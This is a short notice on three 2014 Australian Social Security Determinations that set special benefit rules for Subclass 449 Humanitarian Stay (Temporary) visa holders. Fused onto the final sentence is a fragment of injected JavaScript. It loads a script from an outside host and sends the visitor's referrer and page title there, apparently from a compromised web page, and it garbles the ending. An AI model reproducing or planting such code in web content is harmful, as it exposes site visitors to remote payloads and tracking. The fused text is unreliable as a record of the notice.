Social Security Determinations – SC 449 Humanitarian Stay (Temporary) visas

The Minister for Social Services, has made three Social Security Determinations which affect holders of Subclass 449 Humanitarian Stay (Temporary) visas:

SOCIAL SECURITY (DECLARATION OF VISA IN A CLASS OF VISAS – SPECIAL BENEFIT ACTIVITY TEST) (FED)

Social Security (Declaration of Visa in a Class of Visas – Special Benefit Activity Test) Determination 2014: This determination provides that the holder of a Subclass 449 (Humanitarian Stay (Temporary)) visa may be required to satisfy the activity test in section 731A of the Social Security Act 1991 in order to be qualified for special benefit.

SOCIAL SECURITY (CLASS OF VISAS – QUALIFICATION FOR SPECIAL BENEFIT) DETERMINATION 2014 (FED)

This determination grants a qualification for special benefit under paragraph 729(f)(v) of the Social Security Act 1991 to holders of a Subclass 449 (Humanitarian Stay (Temporary)) visa.

SOCIAL SECURITY (CLASS OF VISAS – NEWLY ARRIVED RESIDENT’S WAITING PERIOD FOR SPECIAL BENEFIT) (FED)

Social Security (Class of Visas – Newly Arrived Resident’s Waiting Period for Special Benefit) Determination 2014: This determination exempts the holders of a Subclass 449 (Humanitarian Stay (Temporary)) visa from the newly arrived resident’s waiting period for special benefit.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
